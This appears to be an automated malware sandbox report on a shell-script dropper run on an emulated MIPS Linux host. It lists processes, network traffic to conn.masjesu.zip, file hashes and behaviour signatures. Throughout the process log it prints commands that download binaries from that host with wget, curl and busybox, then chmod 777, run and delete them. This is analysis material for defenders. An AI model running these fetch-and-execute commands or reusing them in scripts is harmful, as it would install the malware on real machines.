[chmod 777 lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3

[./lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/bin/rm

[rm lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/bin/chmod

[chmod 777 oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza

[./oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/bin/rm

[rm oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/bin/chmod

[chmod 777 Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg

[./Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/bin/rm

[rm Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/bin/chmod

[chmod 777 aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2

[./aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/bin/rm

[rm aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/bin/chmod

[chmod 777 eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5

[./eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/bin/rm

[rm eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/bin/chmod

[chmod 777 WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb

[./WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/bin/rm

[rm WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/bin/chmod

[chmod 777 f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8

[./f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/bin/rm

[rm f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/bin/chmod

[chmod 777 izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q

[./izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/bin/rm

[rm izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

/bin/chmod

[chmod 777 fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

/tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL

[./fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

/bin/rm

[rm fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp

Files

/tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-21 01:58

Reported

2024-10-21 02:01

Platform

debian9-mipsel-20240611-en

Max time kernel

80s

Max time network

82s

Command Line

[/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg N/A
N/A /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 N/A
N/A /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 N/A
N/A /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb N/A
N/A /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 N/A
N/A /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q N/A
N/A /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL N/A
N/A /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz N/A
N/A /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 N/A
N/A /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q N/A
N/A /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh N/A
N/A /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ N/A
N/A /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 N/A
N/A /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza N/A
N/A /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz N/A
N/A /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 N/A
N/A /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q N/A
N/A /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh N/A
N/A /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ N/A
N/A /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 N/A
N/A /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza N/A
N/A /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg N/A
N/A /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 N/A
N/A /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 N/A
N/A /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb N/A
N/A /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 N/A
N/A /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q N/A
N/A /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 /usr/bin/curl N/A
File opened for modification /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 /usr/bin/curl N/A
File opened for modification /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q /usr/bin/curl N/A
File opened for modification /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh /usr/bin/curl N/A
File opened for modification /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ /usr/bin/curl N/A
File opened for modification /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 /usr/bin/curl N/A
File opened for modification /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 /usr/bin/curl N/A
File opened for modification /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL /usr/bin/curl N/A
File opened for modification /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL /usr/bin/curl N/A
File opened for modification /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza /usr/bin/curl N/A
File opened for modification /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg /usr/bin/curl N/A
File opened for modification /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 /usr/bin/curl N/A
File opened for modification /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 /usr/bin/curl N/A
File opened for modification /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q /usr/bin/curl N/A
File opened for modification /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q /usr/bin/curl N/A
File opened for modification /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb /usr/bin/curl N/A
File opened for modification /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q /usr/bin/curl N/A
File opened for modification /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ /usr/bin/curl N/A
File opened for modification /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 /usr/bin/curl N/A
File opened for modification /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 /usr/bin/curl N/A
File opened for modification /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 /usr/bin/curl N/A
File opened for modification /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz /usr/bin/curl N/A
File opened for modification /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza /usr/bin/curl N/A
File opened for modification /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg /usr/bin/curl N/A
File opened for modification /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz /usr/bin/curl N/A
File opened for modification /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 /usr/bin/curl N/A
File opened for modification /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh /usr/bin/curl N/A
File opened for modification /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb /usr/bin/curl N/A

Processes

/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh

[/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]

/bin/chmod

